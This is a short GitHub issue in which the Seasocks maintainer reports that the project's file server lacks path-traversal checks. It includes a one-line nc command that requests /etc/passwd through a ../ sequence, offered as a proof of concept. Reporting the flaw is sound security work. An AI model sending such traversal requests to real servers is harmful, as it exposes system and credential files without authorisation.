seasocks icon indicating copy to clipboard operation
seasocks copied to clipboard

Published 20 hours ago verified publisher icon mattgodbolt

No checks for ../../.. type shenanigans in file server

Open mattgodbolt opened this issue 7 years ago • 0 comments

Not that Seasocks is really meant for secure applications, but...

echo $'GET /../../../../../../../etc/passwd HTTP/1.1\r\n\r\n' | nc localhost 3146

..."works" to get the password file.

mattgodbolt avatar Jun 13 '17 16:06 mattgodbolt